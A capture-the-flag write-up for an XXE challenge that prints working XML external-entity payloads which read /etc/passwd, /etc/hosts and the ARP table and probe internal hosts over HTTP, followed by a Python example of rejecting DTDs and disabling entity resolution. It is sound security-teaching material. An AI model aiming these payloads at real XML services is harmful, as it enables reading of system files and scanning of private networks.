BUUCTF-WEB [NCTF2019] True XML cookbook 1

Key point: an XXE challenge where the external entity is used to scan the internal network.

Reading /etc/passwd

```xml
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>
```

Reading /flag produces an error, because that file does not exist.

Scanning the internal network with XXE

Read /etc/hosts and /proc/net/arp

```xml
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/hosts" >]
>
<user><username>&name;</username><password>1</password></user>
```


```xml
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///proc/net/arp" >]
>
<user><username>&name;</username><password>1</password></user>
```


The ARP table lists quite a few hosts, so let's try requesting them over http://.

```xml
<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "http://10.0.196.1" >]
>
<user><username>&name;</username><password>1</password></user>
```


Load the request into Burp Intruder and run it.


Found it at 10.0.196.11.
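Both the file-read payloads and the http:// host-probing payload above work for the same reason: the server-side parser resolves the `SYSTEM` identifier of a declared external entity and substitutes whatever it fetched into `<username>`. The following is an added example, not code from the write-up or the challenge, showing the two defences that close this hole: refusing any document that carries a DTD at all, and configuring the parser so that external general and parameter entities are never fetched even if a DTD gets through. The payload bodies are constructed to match the ones used above; the benign login document, the `10.0.196.1` host in the second payload (taken from the write-up) and the function names are the example's own assumptions. It uses Python's standard-library `xml.sax` parser.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed inputs. The first two reproduce the shape of the write-up's
# payloads (a SYSTEM entity pointing at a local file and at an internal host);
# the third is what a legitimate login request to this endpoint looks like.
PAYLOAD_FILE = b"""<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user>"""

PAYLOAD_HTTP = b"""<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "http://10.0.196.1">]
>
<user><username>&name;</username><password>1</password></user>"""

BENIGN = b"""<?xml version="1.0" ?>
<user><username>alice</username><password>1</password></user>"""


def dtd_check(raw: bytes) -> bool:
    """First line of defence: a login document never needs a DTD, so any
    DOCTYPE or ENTITY declaration is treated as hostile and the request is
    refused before a parser ever sees it. Returns True when the document is
    clean, False when it should be rejected (and logged for detection)."""
    return b"<!DOCTYPE" not in raw and b"<!ENTITY" not in raw


class _UserHandler(ContentHandler):
    """Collects the text content of <username> and <password>."""

    def __init__(self):
        super().__init__()
        self.fields = {"username": "", "password": ""}
        self._current = None

    def startElement(self, name, attrs):
        if name in self.fields:
            self._current = name

    def endElement(self, name):
        if name == self._current:
            self._current = None

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content


def parse_user(raw: bytes) -> dict:
    """Second line of defence: the parser is told never to fetch external
    general (GE) or parameter (PE) entities. A SYSTEM entity such as the one in
    the payload then expands to nothing instead of to the contents of
    /etc/passwd or to the response of an internal HTTP host."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # enabling this is what makes the payload work
    parser.setFeature(feature_external_pes, False)
    handler = _UserHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(raw))
    return handler.fields


def handle_login(raw: bytes) -> dict:
    """What the endpoint should do: reject documents carrying a DTD outright,
    otherwise parse with the hardened parser."""
    if not dtd_check(raw):
        raise ValueError("DTD/ENTITY declaration in login request rejected")
    return parse_user(raw)


if __name__ == "__main__":
    for label, doc in [("file payload", PAYLOAD_FILE),
                       ("http payload", PAYLOAD_HTTP),
                       ("benign", BENIGN)]:
        try:
            print(label, "->", handle_login(doc))
        except ValueError as exc:
            print(label, "-> rejected:", exc)
    # Parser-level defence on its own, with the DTD check deliberately skipped:
    # the entity reference is left unexpanded and username comes back empty.
    print("hardened parser on file payload ->", parse_user(PAYLOAD_FILE))
```

In the write-up's scenario the entity is expanded and its content is echoed back in the response, which is what turns a parser misconfiguration into both a file-read and an internal port-probing primitive; with `feature_external_ges` off the reference yields an empty string, and with the DTD check in front the request never reaches the parser. On the detection side, the `dtd_check` failure is the event worth alerting on: a `<!DOCTYPE` or `<!ENTITY` in a login body has no legitimate reason to be there.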

I solved this challenge entirely by following a write-up. I have done few XXE challenges, and as soon as the error output is even slightly different I can no longer follow it. XXE, XML external entity injection, means bringing in XML-format files or statements from outside so that they are executed on the server side.